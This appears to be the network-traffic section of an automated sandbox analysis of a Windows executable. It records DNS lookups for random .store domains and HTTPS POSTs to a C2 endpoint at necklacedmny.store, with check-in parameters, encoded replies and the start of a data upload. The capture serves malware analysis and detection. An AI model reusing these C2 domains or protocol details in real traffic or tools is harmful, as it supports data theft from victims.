                                                                      Oct 31, 2024 07:14:10.355634928 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:10.355854034 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:10.357357979 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:10.357501030 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:10.357506037 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:10.646189928 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:10.646261930 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:10.646478891 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:10.646708012 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:10.646718025 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.165236950 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.165293932 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.165369034 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.165749073 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.165765047 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.770930052 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.771049976 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.772500992 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.772512913 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.772715092 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.780011892 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.780894995 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.780926943 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781053066 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781090975 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781203032 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781220913 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781337023 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781368017 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781486988 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781522989 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781651974 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781677961 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781683922 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781699896 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781833887 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781852961 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781871080 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781975985 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781997919 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.791493893 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.791726112 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.791754007 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.791774988 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.791789055 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.791827917 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.791847944 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:14.322335958 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:14.322413921 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:14.322474003 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:14.322868109 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:14.322886944 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:14.349859953 CET49711443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:14.349885941 CET44349711188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:14.349963903 CET49711443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:14.350298882 CET49711443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:14.350310087 CET44349711188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:14.835727930 CET49711443192.168.2.5188.114.96.3

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 31, 2024 07:14:02.863132000 CET5209053192.168.2.51.1.1.1
                                                                      Oct 31, 2024 07:14:02.872148991 CET53520901.1.1.1192.168.2.5
                                                                      Oct 31, 2024 07:14:02.910871983 CET4988953192.168.2.51.1.1.1
                                                                      Oct 31, 2024 07:14:02.923274040 CET53498891.1.1.1192.168.2.5
                                                                      Oct 31, 2024 07:14:02.924571037 CET6278553192.168.2.51.1.1.1
                                                                      Oct 31, 2024 07:14:02.937815905 CET53627851.1.1.1192.168.2.5
                                                                      Oct 31, 2024 07:14:02.944497108 CET5592253192.168.2.51.1.1.1
                                                                      Oct 31, 2024 07:14:02.953301907 CET53559221.1.1.1192.168.2.5
                                                                      Oct 31, 2024 07:14:03.060815096 CET6010753192.168.2.51.1.1.1
                                                                      Oct 31, 2024 07:14:03.077058077 CET53601071.1.1.1192.168.2.5

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Oct 31, 2024 07:14:02.863132000 CET192.168.2.51.1.1.10x6cabStandard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                      Oct 31, 2024 07:14:02.910871983 CET192.168.2.51.1.1.10x78d4Standard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                      Oct 31, 2024 07:14:02.924571037 CET192.168.2.51.1.1.10xda83Standard query (0)fadehairucw.storeA (IP address)IN (0x0001)false
                                                                      Oct 31, 2024 07:14:02.944497108 CET192.168.2.51.1.1.10xe05aStandard query (0)thumbystriw.storeA (IP address)IN (0x0001)false
                                                                      Oct 31, 2024 07:14:03.060815096 CET192.168.2.51.1.1.10xf2Standard query (0)necklacedmny.storeA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Oct 31, 2024 07:14:02.872148991 CET1.1.1.1192.168.2.50x6cabName error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 31, 2024 07:14:02.923274040 CET1.1.1.1192.168.2.50x78d4Name error (3)crisiwarny.storenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 31, 2024 07:14:02.937815905 CET1.1.1.1192.168.2.50xda83Name error (3)fadehairucw.storenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 31, 2024 07:14:02.953301907 CET1.1.1.1192.168.2.50xe05aName error (3)thumbystriw.storenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 31, 2024 07:14:03.077058077 CET1.1.1.1192.168.2.50xf2No error (0)necklacedmny.store188.114.96.3A (IP address)IN (0x0001)false
                                                                      Oct 31, 2024 07:14:03.077058077 CET1.1.1.1192.168.2.50xf2No error (0)necklacedmny.store188.114.97.3A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • necklacedmny.store

                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.549704188.114.96.34436648C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-31 06:14:03 UTC265OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8
                                                                      Host: necklacedmny.store
                                                                      2024-10-31 06:14:03 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                      Data Ascii: act=life
                                                                      2024-10-31 06:14:04 UTC1009INHTTP/1.1 200 OK
                                                                      Date: Thu, 31 Oct 2024 06:14:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=20nnvm2rpkprlel9a1iltmfar9; expires=Mon, 24-Feb-2025 00:00:43 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wmyIeAleooG9AQZGGvrI7S1FerCRihkoNKKnzvD%2FZC6f9TMyvWzFUi4hH7kC75wC5FeWdUX70Rkc4cT8tvA0nFX4tKZkGkinQe1hRDpi2I3P3barzBBy5H7OIx2NgW6S2weDFo%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8db180b20c5a45e3-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1057&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=2776605&cwnd=251&unsent_bytes=0&cid=a1ae01cb72933722&ts=520&x=0"
                                                                      2024-10-31 06:14:04 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                      Data Ascii: 2ok
                                                                      2024-10-31 06:14:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.549705188.114.96.34436648C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-31 06:14:04 UTC266OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 52
                                                                      Host: necklacedmny.store
                                                                      2024-10-31 06:14:04 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                      Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                      2024-10-31 06:14:05 UTC1011INHTTP/1.1 200 OK
                                                                      Date: Thu, 31 Oct 2024 06:14:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=kttf9p11avdgk54sicg3kf11hf; expires=Mon, 24-Feb-2025 00:00:44 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vC70yE8VA0LTefagaj1rLxuIXcrzaEg%2FEIgX7BKDwxp%2Fg0KDX5vthXaRtXEUSfrKXbS0hBxZhSfn4c7MNUruF8O42iCME8fVa0y7cT4EpkD5hMSvU7Lh6A4CGuoMK88rzoKadEw%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8db180b8ed0c46d1-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1177&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=954&delivery_rate=2401326&cwnd=251&unsent_bytes=0&cid=7d432ed0319a656d&ts=482&x=0"
                                                                      2024-10-31 06:14:05 UTC358INData Raw: 34 64 39 0d 0a 77 6f 4e 32 2b 69 59 7a 2f 59 47 69 33 50 52 31 65 78 45 50 36 65 61 39 41 64 2f 51 49 43 39 4f 72 37 36 52 67 62 76 4e 50 33 6d 35 6f 51 44 59 48 41 66 52 6f 39 47 35 31 6b 38 50 59 33 71 4d 79 70 39 67 75 2f 49 61 53 53 2f 44 7a 66 53 74 6d 62 74 53 57 2f 6a 6c 46 35 5a 56 56 74 47 6a 78 36 54 57 54 79 42 71 4c 59 79 49 6e 7a 76 39 74 55 70 4e 4c 38 50 63 38 4f 72 55 76 56 4d 61 71 75 38 52 6b 6b 4e 51 6d 65 44 4f 73 5a 45 51 48 6e 42 6c 68 34 2f 51 61 62 4c 79 44 41 30 72 31 5a 79 72 6f 2f 61 6f 53 78 69 50 34 67 57 52 42 45 37 52 2b 6f 43 35 6d 6c 64 42 4d 32 36 4d 68 4e 46 6e 75 37 74 49 52 79 62 4c 33 66 58 72 79 36 52 5a 45 61 72 68 45 70 4e 4a 57 59 33 74 78 4c 61 61 46 68 52 77 4c 63 58 45 32 48 76 39 36 67 49 65 48 73 37 4e 34 76
                                                                      Data Ascii: 4d9woN2+iYz/YGi3PR1exEP6ea9Ad/QIC9Or76RgbvNP3m5oQDYHAfRo9G51k8PY3qMyp9gu/IaSS/DzfStmbtSW/jlF5ZVVtGjx6TWTyBqLYyInzv9tUpNL8Pc8OrUvVMaqu8RkkNQmeDOsZEQHnBlh4/QabLyDA0r1Zyro/aoSxiP4gWRBE7R+oC5mldBM26MhNFnu7tIRybL3fXry6RZEarhEpNJWY3txLaaFhRwLcXE2Hv96gIeHs7N4v
                                                                      2024-10-31 06:14:05 UTC890INData Raw: 4c 57 64 45 67 74 34 5a 49 61 4a 33 32 36 33 76 55 46 4e 4b 38 66 57 2f 4f 6e 64 6f 6c 41 64 6f 4f 46 55 31 67 52 57 68 36 4f 59 2f 72 55 53 43 58 52 68 6e 63 62 6c 49 36 4c 38 57 77 30 72 77 5a 79 72 6f 39 47 71 58 68 69 72 37 68 65 51 54 30 4f 66 38 63 61 7a 6b 77 55 66 64 6d 4f 42 68 38 31 70 73 37 52 42 52 43 66 45 32 66 54 6e 6d 65 45 64 48 4c 69 68 54 4e 68 6c 58 4a 54 76 79 71 6d 57 56 77 59 39 64 4d 75 44 30 79 50 6c 38 6b 5a 4d 4b 4d 7a 59 2f 65 33 64 6f 31 73 56 72 65 34 53 6b 6b 52 57 6c 65 76 49 76 35 73 63 46 6e 4e 6f 68 6f 44 5a 62 37 79 33 41 67 4e 73 79 73 53 7a 75 35 6d 42 57 68 69 79 6f 79 47 62 53 6c 2b 59 39 59 43 68 32 41 35 5a 64 47 48 4c 33 4a 39 74 75 4c 31 51 54 44 37 49 30 75 48 76 33 4b 6c 51 47 4b 37 68 45 5a 39 4a 58 35 6e 6b
                                                                      Data Ascii: LWdEgt4ZIaJ3263vUFNK8fW/OndolAdoOFU1gRWh6OY/rUSCXRhncblI6L8Ww0rwZyro9GqXhir7heQT0Of8cazkwUfdmOBh81ps7RBRCfE2fTnmeEdHLihTNhlXJTvyqmWVwY9dMuD0yPl8kZMKMzY/e3do1sVre4SkkRWlevIv5scFnNohoDZb7y3AgNsysSzu5mBWhiyoyGbSl+Y9YCh2A5ZdGHL3J9tuL1QTD7I0uHv3KlQGK7hEZ9JX5nk
                                                                      2024-10-31 06:14:05 UTC1369INData Raw: 33 66 39 33 0d 0a 35 78 41 58 4a 44 71 79 62 65 45 48 52 56 39 66 34 61 4f 32 6d 32 78 74 30 31 4e 4c 63 7a 53 2b 65 69 5a 34 52 30 63 75 4b 46 4d 32 47 74 63 6a 2f 48 4b 74 59 64 56 4c 48 42 6a 68 59 50 4a 49 36 4c 38 57 77 30 72 77 5a 79 72 6f 39 4b 70 55 52 65 67 35 77 61 57 53 30 4f 56 38 63 53 77 6b 68 73 58 65 6d 43 45 67 63 31 6e 76 61 42 44 53 43 76 44 30 65 48 6d 6d 65 45 64 48 4c 69 68 54 4e 68 2b 5a 5a 6a 7a 30 62 6e 55 49 68 70 39 59 34 79 53 6e 33 7a 7a 71 77 4a 4b 49 49 32 45 73 2b 44 56 6f 6c 51 65 72 2f 4d 65 6c 45 56 44 6d 4f 72 4a 74 4a 63 5a 46 6e 68 68 6a 70 62 55 62 4c 57 39 51 30 41 68 78 74 6a 7a 6f 35 66 76 57 67 50 67 75 56 53 35 53 56 36 4e 34 4e 48 38 6f 78 51 58 66 57 71 64 78 4d 41 74 70 50 4a 46 51 57 79 56 6e 50 4c 76 31 61
                                                                      Data Ascii: 3f935xAXJDqybeEHRV9f4aO2m2xt01NLczS+eiZ4R0cuKFM2Gtcj/HKtYdVLHBjhYPJI6L8Ww0rwZyro9KpUReg5waWS0OV8cSwkhsXemCEgc1nvaBDSCvD0eHmmeEdHLihTNh+ZZjz0bnUIhp9Y4ySn3zzqwJKII2Es+DVolQer/MelEVDmOrJtJcZFnhhjpbUbLW9Q0Ahxtjzo5fvWgPguVS5SV6N4NH8oxQXfWqdxMAtpPJFQWyVnPLv1a
                                                                      2024-10-31 06:14:05 UTC1369INData Raw: 36 68 4f 54 54 31 57 62 34 38 32 31 6d 42 6b 51 66 32 57 48 67 38 31 75 75 4c 70 49 52 43 6e 42 30 66 44 78 32 71 34 64 56 65 44 6d 44 4e 67 63 45 62 6a 51 39 35 33 57 43 46 64 71 4c 59 79 49 6e 7a 76 39 73 30 70 4b 49 73 6e 4f 2f 66 48 58 71 46 30 64 71 4f 6b 54 6c 45 70 66 6a 65 76 42 76 70 67 59 45 58 70 70 69 6f 44 62 62 37 72 79 44 41 30 72 31 5a 79 72 6f 2f 47 73 52 77 48 69 7a 78 2b 59 51 30 47 4a 2b 49 43 68 32 41 35 5a 64 47 48 4c 33 4a 39 6e 74 72 68 4c 54 69 58 4a 30 66 50 71 31 71 5a 56 46 71 6a 7a 46 5a 4a 57 56 5a 72 69 7a 37 53 53 48 78 56 38 59 59 2b 57 31 43 50 7a 38 6b 56 56 62 4a 57 63 30 2b 6a 50 6a 45 38 4a 34 50 35 61 67 51 52 57 6b 36 4f 59 2f 70 38 62 47 48 4a 6e 6a 59 2f 61 62 72 32 33 53 45 6f 67 7a 64 7a 77 35 64 2b 69 56 52 4f
                                                                      Data Ascii: 6hOTT1Wb4821mBkQf2WHg81uuLpIRCnB0fDx2q4dVeDmDNgcEbjQ953WCFdqLYyInzv9s0pKIsnO/fHXqF0dqOkTlEpfjevBvpgYEXppioDbb7ryDA0r1Zyro/GsRwHizx+YQ0GJ+ICh2A5ZdGHL3J9ntrhLTiXJ0fPq1qZVFqjzFZJWVZriz7SSHxV8YY+W1CPz8kVVbJWc0+jPjE8J4P5agQRWk6OY/p8bGHJnjY/abr23SEogzdzw5d+iVRO
                                                                      2024-10-31 06:14:05 UTC1369INData Raw: 45 74 55 6c 2b 6a 47 73 4a 63 52 46 58 34 74 78 63 54 59 65 2f 33 71 41 6d 6f 32 77 4e 72 6b 38 75 79 6f 58 55 72 67 2f 6c 71 42 42 46 61 54 6f 35 6a 2b 6d 78 73 54 66 6d 69 50 6a 4e 68 67 76 4c 35 47 51 43 48 4a 31 66 66 6d 79 37 31 62 46 61 44 75 47 70 64 49 51 35 48 6d 77 4c 4c 57 57 56 6c 30 64 63 76 63 6e 31 4b 71 73 67 4a 53 59 74 53 63 39 4f 2b 5a 39 78 30 55 72 66 4d 59 6c 30 52 51 6e 4f 66 4c 75 5a 41 52 47 48 42 6f 69 49 48 5a 59 72 32 2b 53 45 6f 6b 78 39 4c 2b 35 64 32 70 57 31 76 75 6f 52 4f 41 42 41 6e 66 30 63 32 77 6e 78 51 66 66 6e 75 6a 74 5a 39 38 38 36 73 43 53 69 43 4e 68 4c 50 6e 30 71 64 52 48 71 6a 6b 46 5a 42 4f 57 5a 44 73 30 72 2b 5a 48 68 35 34 59 49 53 4b 32 6d 32 76 74 55 6c 47 4a 4d 54 53 39 61 4f 58 37 31 6f 44 34 4c 6c 55
                                                                      Data Ascii: EtUl+jGsJcRFX4txcTYe/3qAmo2wNrk8uyoXUrg/lqBBFaTo5j+mxsTfmiPjNhgvL5GQCHJ1ffmy71bFaDuGpdIQ5HmwLLWWVl0dcvcn1KqsgJSYtSc9O+Z9x0UrfMYl0RQnOfLuZARGHBoiIHZYr2+SEokx9L+5d2pW1vuoROABAnf0c2wnxQffnujtZ9886sCSiCNhLPn0qdRHqjkFZBOWZDs0r+ZHh54YISK2m2vtUlGJMTS9aOX71oD4LlU
                                                                      2024-10-31 06:14:05 UTC1369INData Raw: 66 6b 79 4c 71 59 42 52 68 38 4c 63 58 45 32 48 76 39 36 67 4a 38 4f 73 72 62 2f 4b 48 77 71 45 59 61 71 75 49 66 6c 41 52 4f 30 66 71 41 75 5a 70 58 51 54 4e 67 68 34 6e 62 63 62 47 79 51 6b 51 72 78 38 37 38 37 4e 53 73 58 52 36 79 34 41 61 58 54 31 53 63 35 38 2b 78 6d 68 38 54 4d 79 50 4c 67 38 63 6a 35 66 4a 75 54 6a 33 48 6e 74 54 35 7a 36 68 52 43 71 76 73 47 4e 68 62 48 34 61 6a 78 37 4c 57 54 31 6c 7a 62 49 61 57 32 6d 4b 33 75 45 39 46 49 38 6a 5a 2f 4f 66 64 70 46 4d 4a 72 75 34 55 6e 6b 39 51 6d 75 44 4c 74 4a 67 65 43 7a 4d 6a 79 34 50 48 49 2b 58 79 61 46 59 74 77 4e 43 78 7a 64 4b 35 57 6c 6d 42 37 78 2b 66 53 45 66 66 2f 49 36 6e 31 68 41 56 4d 7a 58 4c 6a 64 46 76 76 72 56 4b 52 53 6e 4e 31 2f 50 73 30 36 46 61 43 61 72 74 48 6f 70 4c 55
                                                                      Data Ascii: fkyLqYBRh8LcXE2Hv96gJ8Osrb/KHwqEYaquIflARO0fqAuZpXQTNgh4nbcbGyQkQrx8787NSsXR6y4AaXT1Sc58+xmh8TMyPLg8cj5fJuTj3HntT5z6hRCqvsGNhbH4ajx7LWT1lzbIaW2mK3uE9FI8jZ/OfdpFMJru4Unk9QmuDLtJgeCzMjy4PHI+XyaFYtwNCxzdK5WlmB7x+fSEff/I6n1hAVMzXLjdFvvrVKRSnN1/Ps06FaCartHopLU
                                                                      2024-10-31 06:14:05 UTC1369INData Raw: 68 32 41 35 5a 64 47 48 4c 33 4a 39 6a 75 62 35 42 53 69 4c 43 30 66 7a 6b 30 71 42 58 46 62 4c 75 45 5a 42 49 57 5a 4c 78 79 72 53 45 48 68 42 2b 59 34 4f 57 33 43 50 7a 38 6b 56 56 62 4a 57 63 77 65 6e 61 6f 30 73 57 72 36 45 4c 31 6c 30 52 6d 4f 2b 41 35 74 59 46 43 33 4e 6d 69 34 50 52 63 62 79 36 54 55 63 73 79 39 66 35 34 4e 43 72 55 78 4b 6d 34 42 6d 5a 52 56 47 61 34 38 6d 73 6d 31 64 58 4d 32 71 54 78 49 63 6a 69 72 35 4a 66 43 2f 62 6e 4f 79 74 77 4f 39 61 46 2b 43 35 56 4a 6c 57 58 4a 66 6e 77 4c 4f 51 48 42 68 79 62 6f 75 45 33 47 4f 34 75 55 31 4c 4b 38 44 57 2b 75 72 4c 70 31 6b 4a 6f 4f 30 51 32 41 6f 52 6d 50 75 41 35 74 59 6e 47 6e 68 68 69 34 6e 4b 49 36 4c 38 57 77 30 72 77 5a 79 72 6f 39 47 6b 56 68 32 72 34 68 65 57 54 31 75 51 37 4d
                                                                      Data Ascii: h2A5ZdGHL3J9jub5BSiLC0fzk0qBXFbLuEZBIWZLxyrSEHhB+Y4OW3CPz8kVVbJWcwenao0sWr6EL1l0RmO+A5tYFC3Nmi4PRcby6TUcsy9f54NCrUxKm4BmZRVGa48msm1dXM2qTxIcjir5JfC/bnOytwO9aF+C5VJlWXJfnwLOQHBhybouE3GO4uU1LK8DW+urLp1kJoO0Q2AoRmPuA5tYnGnhhi4nKI6L8Ww0rwZyro9GkVh2r4heWT1uQ7M
                                                                      2024-10-31 06:14:05 UTC1369INData Raw: 44 33 4a 67 67 49 69 64 59 72 43 69 52 51 31 69 6a 64 71 7a 75 34 6e 68 48 52 2b 78 6f 55 7a 49 46 67 72 4b 73 4a 66 75 78 41 68 58 61 69 32 64 78 49 63 78 38 2f 4a 51 44 58 53 4e 6d 2f 44 78 79 36 6c 65 44 61 4f 6d 4b 71 5a 6b 57 70 50 67 7a 4c 2b 52 56 31 63 7a 59 73 76 63 35 69 4f 2b 6f 46 41 43 50 64 76 52 34 2b 53 56 70 30 77 57 72 4b 46 61 32 41 68 56 6c 4f 2f 46 75 59 5a 59 43 32 4e 6d 68 35 4b 54 5a 36 2f 79 44 41 30 39 78 74 50 68 37 64 37 67 54 41 32 74 38 52 65 64 51 78 32 58 38 73 32 79 31 6c 6c 5a 5a 6d 61 48 67 74 4a 32 38 71 4e 55 54 6a 72 4b 6b 50 76 79 31 4b 4d 64 4a 4f 36 68 44 4e 67 63 45 61 72 67 7a 72 43 52 41 51 67 2b 54 59 43 49 33 47 2b 38 74 51 49 44 62 4d 75 63 71 37 43 58 37 31 6b 4b 34 4c 6c 45 79 68 38 45 7a 4c 53 51 37 49 6c
                                                                      Data Ascii: D3JggIidYrCiRQ1ijdqzu4nhHR+xoUzIFgrKsJfuxAhXai2dxIcx8/JQDXSNm/Dxy6leDaOmKqZkWpPgzL+RV1czYsvc5iO+oFACPdvR4+SVp0wWrKFa2AhVlO/FuYZYC2Nmh5KTZ6/yDA09xtPh7d7gTA2t8RedQx2X8s2y1llZZmaHgtJ28qNUTjrKkPvy1KMdJO6hDNgcEargzrCRAQg+TYCI3G+8tQIDbMucq7CX71kK4LlEyh8EzLSQ7Il
                                                                      2024-10-31 06:14:05 UTC1369INData Raw: 5a 33 45 68 7a 44 7a 38 6c 41 4e 64 49 32 62 2f 65 37 59 72 46 4d 59 73 76 4d 53 6d 31 4a 53 32 4e 33 2b 6d 35 73 61 48 48 31 71 74 62 72 2b 61 61 32 2f 54 55 6f 53 38 2b 76 69 35 4d 6e 74 65 78 69 32 34 6c 54 57 42 45 6e 66 75 34 43 66 6e 41 63 55 66 47 72 4c 79 70 39 6e 2f 65 6f 43 61 43 48 41 32 66 33 6b 6d 34 35 58 43 36 33 75 45 39 67 4b 45 5a 4f 6a 6d 50 36 58 48 51 6c 2b 59 6f 7a 49 32 48 6d 36 38 67 77 4e 49 6f 32 45 73 2b 4c 54 76 31 41 55 70 36 30 53 6c 6b 6f 52 67 4b 33 5a 2f 6f 42 58 51 53 41 6a 79 35 61 66 4f 2f 33 31 54 45 41 74 7a 74 4c 77 38 63 75 70 58 67 32 6a 70 69 71 6d 59 56 79 53 35 73 36 35 71 43 6b 34 65 58 32 47 69 39 67 68 6e 62 56 55 54 68 4c 7a 36 2b 4c 6b 79 65 31 37 47 4c 62 69 56 4e 59 45 53 64 2b 37 67 4a 2b 63 42 78 52 38
                                                                      Data Ascii: Z3EhzDz8lANdI2b/e7YrFMYsvMSm1JS2N3+m5saHH1qtbr+aa2/TUoS8+vi5Mntexi24lTWBEnfu4CfnAcUfGrLyp9n/eoCaCHA2f3km45XC63uE9gKEZOjmP6XHQl+YozI2Hm68gwNIo2Es+LTv1AUp60SlkoRgK3Z/oBXQSAjy5afO/31TEAtztLw8cupXg2jpiqmYVyS5s65qCk4eX2Gi9ghnbVUThLz6+Lkye17GLbiVNYESd+7gJ+cBxR8


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.549706188.114.96.34436648C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-31 06:14:06 UTC284OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 12840
                                                                      Host: necklacedmny.store
